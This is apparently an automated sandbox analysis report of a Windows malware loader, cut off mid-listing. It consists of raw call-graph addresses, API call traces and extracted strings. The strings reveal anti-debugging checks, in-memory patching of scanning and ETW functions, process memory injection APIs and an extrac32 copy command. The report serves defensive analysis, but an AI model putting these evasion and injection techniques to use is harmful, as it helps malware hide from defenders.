38772 2984694 11 API calls 38738->38772 38773 2984500 11 API calls 38738->38773 38740 29844d0 11 API calls 38739->38740 38741 299d00e 38740->38741 38741->37734 38743 2987aa0 38742->38743 38744 2987ac1 38743->38744 38774 2987624 42 API calls 38743->38774 38746 299d348 38744->38746 38748 299d365 38746->38748 38747 299d3c3 38749 29844ac 11 API calls 38747->38749 38748->38747 38775 2984694 11 API calls 38748->38775 38776 2984500 11 API calls 38748->38776 38751 299d3d8 38749->38751 38753 29844ac 11 API calls 38751->38753 38754 299d3e0 38753->38754 38754->37754 38756 2984500 11 API calls 38755->38756 38758 299d2f8 38756->38758 38757 299d33f 38757->37784 38758->38757 38759 29849a4 11 API calls 38758->38759 38759->38758 38771 2984da0 RtlDosPathNameToNtPathName_U 38770->38771 38771->38724 38772->38738 38773->38738 38774->38744 38775->38748 38776->38748 38819 29a5e01 38820 298480c 11 API calls 38819->38820 38821 29a5e22 38820->38821 38822 2984798 11 API calls 38821->38822 38823 29a5e59 38822->38823 38824 2997e14 25 API calls 38823->38824 38825 29a5e7d 38824->38825 38826 298480c 11 API calls 38825->38826 38827 29a5e9e 38826->38827 38828 2984798 11 API calls 38827->38828 38829 29a5ed5 38828->38829 38830 2997e14 25 API calls 38829->38830 38831 29a5ef9 38830->38831 38832 298480c 11 API calls 38831->38832 38833 29a5f1a 38832->38833 38834 2984798 11 API calls 38833->38834 38835 29a5f51 38834->38835 38836 2997e14 25 API calls 38835->38836 38837 29a5f75 38836->38837 38838 298480c 11 API calls 38837->38838 38839 29a5f96 38838->38839 38840 2984798 11 API calls 38839->38840 38841 29a5fcd 38840->38841 38842 29a5ff1 38841->38842 38843 2997e14 25 API calls 38841->38843 38844 298480c 11 API calls 38842->38844 38843->38842 38845 29a6012 38844->38845 38846 2984798 11 API calls 38845->38846 38847 29a6049 38846->38847 38848 2997e14 25 API calls 38847->38848 38849 29a606d 38848->38849 38850 298480c 11 API calls 38849->38850 38851 29a608e 38850->38851 38852 2984798 11 API calls 38851->38852 38853 29a60c5 38852->38853 38854 2997e14 25 API calls 38853->38854 38855 29a60e9 38854->38855 38856 298480c 11 API calls 38855->38856 38857 29a610a 38856->38857 38858 2984798 11 API calls 38857->38858 38859 29a6141 38858->38859 38860 2997e14 25 API calls 38859->38860 38861 29a6165 38860->38861 38862 298480c 11 API calls 38861->38862 38863 29a6186 38862->38863 38864 2984798 11 API calls 38863->38864 38865 29a61bd 38864->38865 38866 2997e14 25 API calls 38865->38866 38868 29a61e1 38866->38868 38867 29a6a2d 38870 298480c 11 API calls 38867->38870 38868->38867 38869 298480c 11 API calls 38868->38869 38871 29a6217 38869->38871 38872 29a6a4e 38870->38872 38874 2984798 11 API calls 38871->38874 38873 2984798 11 API calls 38872->38873 38875 29a6a85 38873->38875 38876 29a624e 38874->38876 38877 2997e14 25 API calls 38875->38877 38878 2997e14 25 API calls 38876->38878 38879 29a6aa9 38877->38879 38880 29a6272 38878->38880 38881 298480c 11 API calls 38879->38881 38882 298480c 11 API calls 38880->38882 38884 29a6aca 38881->38884 38883 29a6293 38882->38883 38885 2984798 11 API calls 38883->38885 38886 2984798 11 API calls 38884->38886 38888 29a62ca 38885->38888 38887 29a6b01 38886->38887 38889 2997e14 25 API calls 38887->38889 38890 2997e14 25 API calls 38888->38890 38891 29a6b25 38889->38891 38892 29a62ee 38890->38892 38893 298480c 11 API calls 38891->38893 38894 298480c 11 API calls 38892->38894 38896 29a6b46 38893->38896 38895 29a630f 38894->38895 38897 2984798 11 API calls 38895->38897 38898 2984798 11 API calls 38896->38898 38900 29a6346 38897->38900 38899 29a6b7d 38898->38899 38901 2997e14 25 API calls 38899->38901 38902 2997e14 25 API calls 38900->38902 38908 29a6ba1 38901->38908 38903 29a636a 38902->38903 38904 298480c 11 API calls 38903->38904 38907 29a638b 38904->38907 38905 29a7381 38906 298480c 11 API calls 38905->38906 38911 29a73a2 38906->38911 38909 2984798 11 API calls 38907->38909 38908->38905 38910 298480c 11 API calls 38908->38910 38913 29a63c2 38909->38913 38914 29a6bec 38910->38914 38912 2984798 11 API calls 38911->38912 38917 29a73d9 38912->38917 38916 2997e14 25 API calls 38913->38916 38915 2984798 11 API calls 38914->38915 38921 29a6c23 38915->38921 38918 29a63e6 38916->38918 38920 2997e14 25 API calls 38917->38920 38919 298480c 11 API calls 38918->38919 38925 29a6407 38919->38925 38922 29a73fd 38920->38922 38924 2997e14 25 API calls 38921->38924 38923 298480c 11 API calls 38922->38923 38929 29a741e 38923->38929 38926 29a6c47 38924->38926 38928 2984798 11 API calls 38925->38928 38927 298480c 11 API calls 38926->38927 38932 29a6c68 38927->38932 38931 29a643e 38928->38931 38930 2984798 11 API calls 38929->38930 38935 29a7455 38930->38935 38933 2997e14 25 API calls 38931->38933 38934 2984798 11 API calls 38932->38934 38936 29a6462 38933->38936 38939 29a6c9f 38934->38939 38938 2997e14 25 API calls 38935->38938 38937 298480c 11 API calls 38936->38937 38943 29a6483 38937->38943 38940 29a7479 38938->38940 38942 2997e14 25 API calls 38939->38942 38941 298480c 11 API calls 38940->38941 38947 29a749a 38941->38947 38944 29a6cc3 38942->38944 38946 2984798 11 API calls 38943->38946 38945 298480c 11 API calls 38944->38945 38950 29a6ce4 38945->38950 38949 29a64ba 38946->38949 38948 2984798 11 API calls 38947->38948 38954 29a74d1 38948->38954 38951 2997e14 25 API calls 38949->38951 38952 2984798 11 API calls 38950->38952 38953 29a64de 38951->38953 38958 29a6d1b 38952->38958 38955 2982ee0 2 API calls 38953->38955 38956 2997e14 25 API calls 38954->38956 38957 29a64e3 38955->38957 38962 29a74f5 38956->38962 38960 298480c 11 API calls 38957->38960 38959 2997e14 25 API calls 38958->38959 38961 29a6d3f 38959->38961 38967 29a651c 38960->38967 38963 299d270 11 API calls 38961->38963 38965 2997e14 25 API calls 38962->38965 38964 29a6d5a 38963->38964 38966 298480c 11 API calls 38964->38966 38969 29a7528 38965->38969 38970 29a6d83 38966->38970 38968 2984798 11 API calls 38967->38968 38972 29a6553 38968->38972 38971 2997e14 25 API calls 38969->38971 38973 298480c 11 API calls 38970->38973 38975 29a755b 38971->38975 38974 2997e14 25 API calls 38972->38974 38977 29a6dbb 38973->38977 38976 29a6577 38974->38976 38979 2997e14 25 API calls 38975->38979 38978 298480c 11 API calls 38976->38978 38980 2984798 11 API calls 38977->38980 38981 29a6598 38978->38981 38982 29a758e 38979->38982 38983 29a6df2 38980->38983 38984 2984798 11 API calls 38981->38984 38985 2997e14 25 API calls 38982->38985 38986 2997e14 25 API calls 38983->38986 38990 29a65cf 38984->38990 38987 29a75c1 38985->38987 38988 29a6e16 38986->38988 38989 298480c 11 API calls 38987->38989 38991 298480c 11 API calls 38988->38991 38994 29a75e2 38989->38994 38992 2997e14 25 API calls 38990->38992 38996 29a6e37 38991->38996 38993 29a65f3 38992->38993 38995 298480c 11 API calls 38993->38995 38997 2984798 11 API calls 38994->38997 38999 29a6614 38995->38999 38998 2984798 11 API calls 38996->38998 39000 29a7619 38997->39000 39001 29a6e6e 38998->39001 39002 2984798 11 API calls 38999->39002 39003 2997e14 25 API calls 39000->39003 39004 2997e14 25 API calls 39001->39004 39009 29a664b 39002->39009 39005 29a763d 39003->39005 39006 29a6e92 39004->39006 39007 298480c 11 API calls 39005->39007 39008 2987e20 GetFileAttributesA 39006->39008 39016 29a765e 39007->39016 39010 29a6e9c 39008->39010 39011 2997e14 25 API calls 39009->39011 39012 29a717b 39010->39012 39014 298480c 11 API calls 39010->39014 39013 29a666f GetCurrentProcess 39011->39013 39015 298480c 11 API calls 39012->39015 39364 2997944 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 39013->39364 39022 29a6ec5 39014->39022 39021 29a719c 39015->39021 39019 2984798 11 API calls 39016->39019 39018 29a6689 39020 298480c 11 API calls 39018->39020 39025 29a7695 39019->39025 39026 29a66af 39020->39026 39024 2984798 11 API calls 39021->39024 39023 2984798 11 API calls 39022->39023 39030 29a6efc 39023->39030 39031 29a71d3 39024->39031 39027 2997e14 25 API calls 39025->39027 39029 2984798 11 API calls 39026->39029 39028 29a76b9 39027->39028 39032 298480c 11 API calls 39028->39032 39037 29a66e6 39029->39037 39033 2997e14 25 API calls 39030->39033 39034 2997e14 25 API calls 39031->39034 39040 29a76da 39032->39040 39035 29a6f20 39033->39035 39036 29a71f7 39034->39036 39038 298480c 11 API calls 39035->39038 39039 298480c 11 API calls 39036->39039 39041 2997e14 25 API calls 39037->39041 39045 29a6f41 39038->39045 39046 29a7218 39039->39046 39043 2984798 11 API calls 39040->39043 39042 29a670a 39041->39042 39044 298480c 11 API calls 39042->39044 39048 29a7711 39043->39048 39050 29a672b 39044->39050 39049 2984798 11 API calls 39045->39049 39047 2984798 11 API calls 39046->39047 39054 29a724f 39047->39054 39051 2997e14 25 API calls 39048->39051 39053 29a6f78 39049->39053 39052 2984798 11 API calls 39050->39052 39057 29a7735 39051->39057 39060 29a6762 39052->39060 39055 2997e14 25 API calls 39053->39055 39056 2997e14 25 API calls 39054->39056 39058 29a6f9c 39055->39058 39059 29a7273 39056->39059 39063 2997e14 25 API calls 39057->39063 39061 298480c 11 API calls 39058->39061 39062 298480c 11 API calls 39059->39062 39064 2997e14 25 API calls 39060->39064 39067 29a6fbd 39061->39067 39068 29a7294 39062->39068 39069 29a7768 39063->39069 39065 29a6786 39064->39065 39066 298480c 11 API calls 39065->39066 39073 29a67a7 39066->39073 39070 2984798 11 API calls 39067->39070 39071 2984798 11 API calls 39068->39071 39072 2997e14 25 API calls 39069->39072 39075 29a6ff4 39070->39075 39076 29a72cb 39071->39076 39077 29a779b 39072->39077 39074 2984798 11 API calls 39073->39074 39083 29a67de 39074->39083 39078 2997e14 25 API calls 39075->39078 39079 2997e14 25 API calls 39076->39079 39080 2997e14 25 API calls 39077->39080 39081 29a7018 39078->39081 39082 29a72ef 39079->39082 39089 29a77ce 39080->39089 39084 299cec8 11 API calls 39081->39084 39085 298480c 11 API calls 39082->39085 39087 2997e14 25 API calls 39083->39087 39086 29a702d 39084->39086 39094 29a7310 39085->39094 39088 2984500 11 API calls 39086->39088 39090 29a6802 39087->39090 39091 29a703d 39088->39091 39095 2997e14 25 API calls 39089->39095 39092 29849a4 11 API calls 39090->39092 39093 298480c 11 API calls 39091->39093 39096 29a6826 39092->39096 39099 29a705e 39093->39099 39097 2984798 11 API calls 39094->39097 39100 29a7801 39095->39100 39098 298480c 11 API calls 39096->39098 39101 29a7347 39097->39101 39107 29a6855 39098->39107 39103 2984798 11 API calls 39099->39103 39102 2997e14 25 API calls 39100->39102 39105 2997e14 25 API calls 39101->39105 39104 29a7834 39102->39104 39109 29a7095 39103->39109 39106 298480c 11 API calls 39104->39106 39108 29a736b 39105->39108 39115 29a7855 39106->39115 39111 2984798 11 API calls 39107->39111 39110 29849a4 11 API calls 39108->39110 39113 2997e14 25 API calls 39109->39113 39112 29a7375 39110->39112 39119 29a688c 39111->39119 39114 29981b8 43 API calls 39112->39114 39116 29a70b9 39113->39116 39114->38905 39118 2984798 11 API calls 39115->39118 39117 298480c 11 API calls 39116->39117 39123 29a70da 39117->39123 39124 29a788c 39118->39124 39120 2997e14 25 API calls 39119->39120 39121 29a68b0 39120->39121 39122 298480c 11 API calls 39121->39122 39129 29a68d1 39122->39129 39125 2984798 11 API calls 39123->39125 39126 2997e14 25 API calls 39124->39126 39130 29a7111 39125->39130 39127 29a78b0 39126->39127 39128 298480c 11 API calls 39127->39128 39133 29a78d1 39128->39133 39131 2984798 11 API calls 39129->39131 39132 2997e14 25 API calls 39130->39132 39135 29a6908 39131->39135 39140 29a7135 39132->39140 39134 2984798 11 API calls 39133->39134 39139 29a7908 39134->39139 39136 2997e14 25 API calls 39135->39136 39137 29a692c 39136->39137 39138 298480c 11 API calls 39137->39138 39143 29a694d 39138->39143 39142 2997e14 25 API calls 39139->39142 39141 299c7b4 18 API calls 39140->39141 39141->39012 39144 29a792c 39142->39144 39145 2984798 11 API calls 39143->39145 39146 2997e14 25 API calls 39144->39146 39149 29a6984 39145->39149 39147 29a795f 39146->39147 39148 298480c 11 API calls 39147->39148 39152 29a7980 39148->39152 39150 2997e14 25 API calls 39149->39150 39151 29a69a8 EnumSystemLocalesA GetCurrentProcess 39150->39151 39153 2997cc8 4 API calls 39151->39153 39156 2984798 11 API calls 39152->39156 39154 29a69c9 GetCurrentProcess 39153->39154 39155 2997cc8 4 API calls 39154->39155 39157 29a69dd GetCurrentProcess 39155->39157 39161 29a79b7 39156->39161 39158 2997cc8 4 API calls 39157->39158 39159 29a69f1 GetCurrentProcess 39158->39159 39160 2997cc8 4 API calls 39159->39160 39162 29a6a05 GetCurrentProcess 39160->39162 39163 2997e14 25 API calls 39161->39163 39164 2997cc8 4 API calls 39162->39164 39165 29a79db 39163->39165 39166 29a6a19 GetCurrentProcess 39164->39166 39167 298480c 11 API calls 39165->39167 39168 2997cc8 4 API calls 39166->39168 39169 29a79fc 39167->39169 39168->38867 39170 2984798 11 API calls 39169->39170 39171 29a7a33 39170->39171 39172 2997e14 25 API calls 39171->39172 39173 29a7a57 39172->39173 39174 298480c 11 API calls 39173->39174 39175 29a7a78 39174->39175 39176 2984798 11 API calls 39175->39176 39177 29a7aaf 39176->39177 39178 2997e14 25 API calls 39177->39178 39179 29a7ad3 39178->39179 39180 2997e14 25 API calls 39179->39180 39181 29a7b06 39180->39181 39182 2997e14 25 API calls 39181->39182 39183 29a7b39 39182->39183 39184 2997e14 25 API calls 39183->39184 39185 29a7b6c 39184->39185 39186 2997e14 25 API calls 39185->39186 39187 29a7b9f 39186->39187 39188 298480c 11 API calls 39187->39188 39189 29a7bc0 39188->39189 39190 2984798 11 API calls 39189->39190 39191 29a7bf7 39190->39191 39192 2997e14 25 API calls 39191->39192 39193 29a7c1b 39192->39193 39194 298480c 11 API calls 39193->39194 39195 29a7c3c 39194->39195 39196 2984798 11 API calls 39195->39196 39197 29a7c73 39196->39197 39198 2997e14 25 API calls 39197->39198 39199 29a7c97 39198->39199 39200 2997e14 25 API calls 39199->39200 39201 29a7cca 39200->39201 39202 2997e14 25 API calls 39201->39202 39203 29a7cfd 39202->39203 39204 2997e14 25 API calls 39203->39204 39205 29a7d30 39204->39205 39206 2997e14 25 API calls 39205->39206 39207 29a7d63 39206->39207 39208 2997e14 25 API calls 39207->39208 39209 29a7d96 39208->39209 39210 298480c 11 API calls 39209->39210 39211 29a7db7 39210->39211 39212 2984798 11 API calls 39211->39212 39213 29a7dee 39212->39213 39214 2997e14 25 API calls 39213->39214 39215 29a7e12 39214->39215 39216 298480c 11 API calls 39215->39216 39217 29a7e33 39216->39217 39218 2984798 11 API calls 39217->39218 39219 29a7e6a 39218->39219 39220 2997e14 25 API calls 39219->39220 39221 29a7e8e 39220->39221 39222 298480c 11 API calls 39221->39222 39223 29a7eaf 39222->39223 39224 2984798 11 API calls 39223->39224 39225 29a7ee6 39224->39225 39226 2997e14 25 API calls 39225->39226 39227 29a7f0a 39226->39227 39228 298480c 11 API calls 39227->39228 39229 29a7f2b 39228->39229 39230 2984798 11 API calls 39229->39230 39231 29a7f62 39230->39231 39232 2997e14 25 API calls 39231->39232 39233 29a7f86 39232->39233 39234 298480c 11 API calls 39233->39234 39235 29a7fa7 39234->39235 39236 2984798 11 API calls 39235->39236 39237 29a7fde 39236->39237 39238 2997e14 25 API calls 39237->39238 39239 29a8002 39238->39239 39240 2997e14 25 API calls 39239->39240 39241 29a8011 39240->39241 39242 2997e14 25 API calls 39241->39242 39243 29a8020 39242->39243 39244 2997e14 25 API calls 39243->39244 39245 29a802f 39244->39245 39246 2997e14 25 API calls 39245->39246 39247 29a803e 39246->39247 39248 2997e14 25 API calls 39247->39248 39249 29a804d 39248->39249 39250 2997e14 25 API calls 39249->39250 39251 29a805c 39250->39251 39252 2997e14 25 API calls 39251->39252 39253 29a806b 39252->39253 39254 2997e14 25 API calls 39253->39254 39255 29a807a 39254->39255 39256 2997e14 25 API calls 39255->39256 39257 29a8089 39256->39257 39258 2997e14 25 API calls 39257->39258 39259 29a8098 39258->39259 39260 2997e14 25 API calls 39259->39260 39261 29a80a7 39260->39261 39262 2997e14 25 API calls 39261->39262 39263 29a80b6 39262->39263 39264 2997e14 25 API calls 39263->39264 39265 29a80c5 39264->39265 39266 2997e14 25 API calls 39265->39266 39267 29a80d4 39266->39267 39268 2997e14 25 API calls 39267->39268 39269 29a80e3 39268->39269 39270 298480c 11 API calls 39269->39270 39271 29a8104 39270->39271 39272 2984798 11 API calls 39271->39272 39273 29a813b 39272->39273 39274 2997e14 25 API calls 39273->39274 39275 29a815f 39274->39275 39276 2997e14 25 API calls 39275->39276 39277 29a8192 39276->39277 39278 2997e14 25 API calls 39277->39278 39279 29a81c5 39278->39279 39280 2997e14 25 API calls 39279->39280 39281 29a81f8 39280->39281 39282 2997e14 25 API calls 39281->39282 39283 29a822b 39282->39283 39284 2997e14 25 API calls 39283->39284 39285 29a825e 39284->39285 39286 2997e14 25 API calls 39285->39286 39287 29a8291 39286->39287 39288 2997e14 25 API calls 39287->39288 39289 29a82c4 39288->39289 39290 298480c 11 API calls 39289->39290 39291 29a82e5 39290->39291 39292 2984798 11 API calls 39291->39292 39293 29a831c 39292->39293 39294 2997e14 25 API calls 39293->39294 39295 29a8340 39294->39295 39296 298480c 11 API calls 39295->39296 39297 29a8361 39296->39297 39298 2984798 11 API calls 39297->39298 39299 29a8398 39298->39299 39300 2997e14 25 API calls 39299->39300 39301 29a83bc 39300->39301 39302 298480c 11 API calls 39301->39302 39303 29a83dd 39302->39303 39304 2984798 11 API calls 39303->39304 39305 29a8414 39304->39305 39306 2997e14 25 API calls 39305->39306 39307 29a8438 39306->39307 39308 2997e14 25 API calls 39307->39308 39309 29a846b 39308->39309 39310 2997e14 25 API calls 39309->39310 39311 29a849e 39310->39311 39312 2997e14 25 API calls 39311->39312 39313 29a84d1 39312->39313 39314 2997e14 25 API calls 39313->39314 39315 29a8504 39314->39315 39316 2997e14 25 API calls 39315->39316 39317 29a8537 39316->39317 39318 2997e14 25 API calls 39317->39318 39319 29a856a 39318->39319 39320 2997e14 25 API calls 39319->39320 39321 29a859d 39320->39321 39322 2997e14 25 API calls 39321->39322 39323 29a85d0 39322->39323 39324 2997e14 25 API calls 39323->39324 39325 29a8603 39324->39325 39326 2997e14 25 API calls 39325->39326 39327 29a8636 39326->39327 39328 2997e14 25 API calls 39327->39328 39329 29a8669 39328->39329 39330 2997e14 25 API calls 39329->39330 39331 29a869c 39330->39331 39332 2997e14 25 API calls 39331->39332 39333 29a86cf 39332->39333 39334 2997e14 25 API calls 39333->39334 39335 29a8702 39334->39335 39336 2997e14 25 API calls 39335->39336 39337 29a8735 39336->39337 39338 2997e14 25 API calls 39337->39338 39339 29a8768 39338->39339 39340 2997e14 25 API calls 39339->39340 39341 29a879b 39340->39341 39342 2997e14 25 API calls 39341->39342 39343 29a87ce 39342->39343 39344 2997e14 25 API calls 39343->39344 39345 29a8801 39344->39345 39346 298480c 11 API calls 39345->39346 39347 29a8822 39346->39347 39348 2984798 11 API calls 39347->39348 39349 29a8859 39348->39349 39350 2997e14 25 API calls 39349->39350 39351 29a887d 39350->39351 39352 298480c 11 API calls 39351->39352 39353 29a889e 39352->39353 39354 2984798 11 API calls 39353->39354 39355 29a88d5 39354->39355 39356 2997e14 25 API calls 39355->39356 39364->39018

                                                                              Executed Functions

                                                                              Function 0299DAA4 Relevance: 236.3, APIs: 15, Strings: 115, Instructions: 8814COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InetIsOffline.URL(00000000,00000000,029A8D49,?,?,00000000,00000000), ref: 0299DAD2
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                                • Part of subcall function 0299CD74: GetTickCount.KERNEL32 ref: 0299CD82
                                                                                • Part of subcall function 0299CD74: Sleep.KERNEL32(00000000,?,0299DCF4,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 0299CD94
                                                                                • Part of subcall function 0299CD74: GetTickCount.KERNEL32 ref: 0299CD99
                                                                                • Part of subcall function 0299D8C4: GetModuleHandleW.KERNEL32(KernelBase,?,0299DD01,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 0299D8CA
                                                                                • Part of subcall function 0299D8C4: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0299D8DC
                                                                                • Part of subcall function 0299D920: GetModuleHandleW.KERNEL32(KernelBase), ref: 0299D930
                                                                                • Part of subcall function 0299D920: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0299D942
                                                                                • Part of subcall function 0299D920: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0299D959
                                                                                • Part of subcall function 0299D9A4: GetModuleHandleW.KERNEL32(ntdll), ref: 0299D9B4
                                                                                • Part of subcall function 0299D9A4: GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 0299D9C6
                                                                                • Part of subcall function 0299D9A4: NtQueryInformationProcess.NTDLL(FFFFFFFF,00000007,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 0299D9E5
                                                                                • Part of subcall function 0299DA24: GetModuleHandleW.KERNEL32(ntdll), ref: 0299DA34
                                                                                • Part of subcall function 0299DA24: GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 0299DA46
                                                                                • Part of subcall function 0299DA24: NtQueryInformationProcess.NTDLL(FFFFFFFF,0000001F,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 0299DA65
                                                                                • Part of subcall function 02987E20: GetFileAttributesA.KERNEL32(00000000,?,0299E793,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,UacInitialize), ref: 02987E2B
                                                                                • Part of subcall function 0298C2F4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,0299EAC5,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession), ref: 0298C30B
                                                                                • Part of subcall function 0299C898: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C968), ref: 0299C8D3
                                                                                • Part of subcall function 0299C898: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0299C968), ref: 0299C903
                                                                                • Part of subcall function 0299C898: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0299C918
                                                                                • Part of subcall function 0299C898: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0299C944
                                                                                • Part of subcall function 0299C898: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0299C94D
                                                                                • Part of subcall function 02987E44: GetFileAttributesA.KERNEL32(00000000,?,029A1920,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 02987E4F
                                                                                • Part of subcall function 02987FD8: CreateDirectoryA.KERNEL32(00000000,00000000,?,029A1ABE,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize,029D7358,029A8D7C,ScanString,029D7358,029A8D7C), ref: 02987FE5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileModule$AddressHandleProc$InformationQuery$AttributesCountLibraryNamePathProcessTick$CacheCheckCloseCreateDebuggerDirectoryFlushFreeInetInstructionLoadName_OfflineOpenPresentReadRemoteSleep
                                                                              • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                              • API String ID: 2874859968-4244479126
                                                                              • Opcode ID: 17754452be089658fc92aaa2800536896a532ed217af990c2a833b8c8306ace1
                                                                              • Instruction ID: 5af98b195a6920553e0caf1465d97ee80d0f8e532a077ffd0dad24334584f013
                                                                              • Opcode Fuzzy Hash: 17754452be089658fc92aaa2800536896a532ed217af990c2a833b8c8306ace1
                                                                              • Instruction Fuzzy Hash: B7040B34A5021A8FDB20FBA4DC90ADEB3BABFD9310F1455E5D009EB250DB31AE819F55
                                                                              Function 029A5E01 Relevance: 166.9, APIs: 9, Strings: 85, Instructions: 2415COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4593 29a5e01-29a5feb call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 4648 29a5ff1-29a61f0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 4593->4648 4649 29a5fec call 2997e14 4593->4649 4708 29a6a2d-29a6bb0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 4648->4708 4709 29a61f6-29a6815 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982ee0 call 